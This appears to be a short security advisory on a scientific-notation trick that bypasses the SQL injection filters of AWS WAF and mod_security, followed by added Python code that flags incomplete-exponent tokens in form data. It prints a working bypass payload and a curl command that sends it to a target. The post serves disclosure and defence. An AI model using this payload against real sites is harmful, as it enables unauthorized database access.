Scientific notation bug bypasses AWS WAF protection

AWS WAF and the mod_security Apache module were affected by a scientific notation bug, discovered back in 2013, that allowed an attacker to bypass the WAF and successfully exploit a SQL injection vulnerability.

The payload used for the attack, showing the scientific notation, is below:

"x=1' or 1.e(1) or '1'='1"

By executing the following command, it was possible to bypass the WAF SQL injection protection and exploit a SQL injection on the underlying web application:

$ curl -i -H "Origin: http://domain" -X POST \
  "http://$DOMAIN/index.php" -d "x=1' or 1.e(1) or '1'='1"

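A defensive check for the token shape in the payload above, as an added example that is not part of the original post: after URL-decoding, it flags form parameters containing a number with an exponent marker but no exponent digits (such as `1.e(`). The function names, the regular expression and the sample bodies are constructed for illustration; the pattern is a heuristic and is not the rule used by AWS WAF or mod_security.

```python
import re
from urllib.parse import parse_qsl, unquote

# A number with an exponent marker but no exponent digits, e.g. "1.e(" or "1e ".
# Well-formed literals such as 1e5, 1.5e10 or 2E-3 do not match, and neither
# does a digit run inside a longer word or hex literal (0x1e).
INCOMPLETE_EXPONENT = re.compile(
    r"(?<![\w.])\d+(?:\.\d*)?e(?![+-]?\d)", re.IGNORECASE
)

MAX_DECODE_PASSES = 3  # assumption: how many nested URL-encodings to undo


def fully_decode(value):
    """Undo repeated percent-encoding so an encoded token is inspected too."""
    for _ in range(MAX_DECODE_PASSES):
        decoded = unquote(value)  # not unquote_plus: keep "+" in "1e+5" intact
        if decoded == value:
            break
        value = decoded
    return value


def find_incomplete_exponents(value):
    """Return every incomplete scientific-notation token in one value."""
    return [m.group(0) for m in INCOMPLETE_EXPONENT.finditer(fully_decode(value))]


def scan_form_body(body):
    """Map each form parameter name to the suspicious tokens in its value."""
    findings = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        hits = find_incomplete_exponents(value)
        if hits:
            findings.setdefault(name, []).extend(hits)
    return findings


# Constructed sample request bodies; the first is the payload quoted on this page.
SAMPLES = [
    "x=1' or 1.e(1) or '1'='1",                # raw, as sent by curl -d
    "x=1%27+or+1.e%281%29+or+%271%27%3D%271",  # URL-encoded once
    "x=1%2527%2520or%25201.e%25281%2529",      # URL-encoded twice
    "amount=1.5e10&rate=2E-3&id=0x1e",         # benign numeric values
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(body, "->", scan_form_body(body) or "clean")
```

Because the pattern matches on shape alone, it also flags harmless text such as "3e edition", so it suits alerting or log review better than blocking.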